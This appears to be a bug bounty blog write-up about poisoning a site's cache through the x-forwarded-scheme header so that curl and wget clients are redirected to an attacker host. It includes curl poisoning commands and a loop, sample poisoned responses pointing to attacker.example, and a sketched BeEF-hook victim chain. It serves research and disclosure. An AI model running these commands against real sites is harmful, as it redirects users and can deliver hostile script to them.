Cache poisoning of wget

Vuk Ivanovic

[Image: a real-world example of cache poison detection (edited to hide the affected company)]

Another interesting case of cache poisoning (you can read about the first one here). This one, however, isn’t as “sexy” as the previous one. You have been warned.

There are times when Burp and a web browser (be it Firefox or Chrome) don’t quite agree on how to present the response to a given request (especially if the request carries an XSS payload). This is one of those stories.

My default approach to bug hunting is to browse the target website with Burp as a proxy. And, if the WAF is kind enough, I keep Param Miner enabled without getting blocked, with the “attempt cache poison” box checked.

And, if the web server is not configured correctly, or, to be honest, if the stars are aligned, the result is a useful cache poison, like the one linked earlier. But this is not that story. Not to say that the case in this story isn’t useful, it’s just harder to sell.

Enough chit-chat/exposition, let’s dig into it:

After browsing the target website and doing all sorts of tests, getting nothing, I figured it was time to review. I checked the Burp Pro dashboard, and as a nice boost I noticed that Param Miner had found something. But, from past experience, I already knew it was too early to get excited.

Upon reviewing the finding, and doing some additional tests to make sure it wasn’t the dreaded false positive, I found myself with a cache poison that was an open redirect, but better. Visiting website.com would redirect the visitor/victim to whatever I had specified in the hidden header. Initial impact: a version of DoS, but instead of denying the service by crashing the server, it denies it by redirecting people to another website. Additional impact could be phishing, depending on various factors. But, alas, I soon learned an ugly truth.
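
To make the mechanics concrete, here is roughly what the poisoned exchange looks like (hostnames, status code and the X-Cache header are illustrative, not the target’s actual responses, and the exact shape of the Location value turns out to matter, more on that below):

GET / HTTP/1.1
Host: website.com
x-forwarded-scheme: https://attacker.example

HTTP/1.1 301 Moved Permanently
Location: https://attacker.example
X-Cache: miss

Once the cache has stored that response, every plain visitor gets the redirect too:

GET / HTTP/1.1
Host: website.com

HTTP/1.1 301 Moved Permanently
Location: https://attacker.example
X-Cache: hit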

Burp Repeater vs. web browser:

I love using Burp Repeater over any web browser when it comes to bug hunting. I can immediately see the source code of the page, the response time (useful when testing for time-based SQLi/RCE), the headers (useful when testing for CORS, CSRF), and there’s a nice search-box feature on the response (“Auto-scroll to match when text changes”, useful for XSS testing among other things).

But, while the response can show, even within the HTML code, that your XSS payload wasn’t encoded, and even “Show response in browser” may result in the XSS firing, it could still be a false positive. The only way to be sure is to open that URL with that XSS payload directly in Firefox, Chrome, etc. If it still fires in one or more of those browsers, you’re good. Time to write a report. Otherwise, it gets complicated.

PoC with limitations:

The hidden header in question: x-forwarded-scheme

The attack, with curl, as a way to poison the cache (it has to be repeated multiple times, or can be wrapped in a loop, as shown below):

curl --header "x-forwarded-scheme: https://burpcollab.net" https://website.com/
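
For instance, a crude loop along these lines (the iteration count is arbitrary, just enough for one request to land on a cache miss and get the poisoned response stored):

for i in $(seq 1 20); do
  curl -s -o /dev/null --header "x-forwarded-scheme: https://burpcollab.net" https://website.com/
done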

Results:

curl https://website.com shows the content of https://burpcollab.net

wget https://website.com saves a file with the content of https://burpcollab.net

What’s missing from the PoC results? Did you spot it yet? The same thing, but with a browser. And clearly not just because it would require some masterful editing of a GIF or a YouTube clip, but because it doesn’t work with browsers. I tried all of them and always got the same boring response.

And some more limitations:

Aside from it only working with curl and wget (I didn’t bother trying telnet and the like), there’s another limitation. x-forwarded-scheme is actually meant to carry just http or https, similar to x-forwarded-proto. Meaning, instead of turning https://website.com into https://burpcollab.net, the value produces a redirect to https://burpcollab.net://website.com (instead of https://website.com or http://website.com), and Burp Collaborator is configured to ignore all sorts of malformed requests, therefore the ://website.com part is ignored. The solution would be a payload that ends with # or %23, depending on how it’s interpreted on the other end.
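
In theory, something like this should truncate the bogus suffix (an untested sketch; whether the # survives or needs to be sent encoded as %23 depends on the server):

curl --header "x-forwarded-scheme: https://burpcollab.net%23" https://website.com/

The goal being a Location of https://burpcollab.net#://website.com, where everything after the # is a fragment that the client never sends to burpcollab.net.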

Bonus: yet another limitation is that the attacker’s website has to be HTTPS; it doesn’t work with plain HTTP, for whatever reason.

How to exploit it?

It’s not easy. The attacker would have to somehow trick the victim into using wget to access the website in question, and then into opening the downloaded HTML file without verifying its content, while, in fact, that HTML file would contain XSS payloads (a BeEF hook or similar), and that way the attacker could gain some control over the victim’s browser. But that’s pretty far-fetched. And yet, I did try selling it as such. I remember, as I was writing the painful reproduction steps and a scenario straight out of a Hollywood movie (jk, but you get the point), being pretty sure that I was simply doing some writing/typing exercises. I did get some nice kudos points, though :)
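
For completeness, from the victim’s side the chain would boil down to something like this (with a generic BeEF hook as the textbook payload, not what I actually served):

wget https://website.com/
firefox index.html

wget saves index.html with the attacker page’s content, and opening that file locally runs whatever script it references, e.g. a hook.js served from the attacker’s domain.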
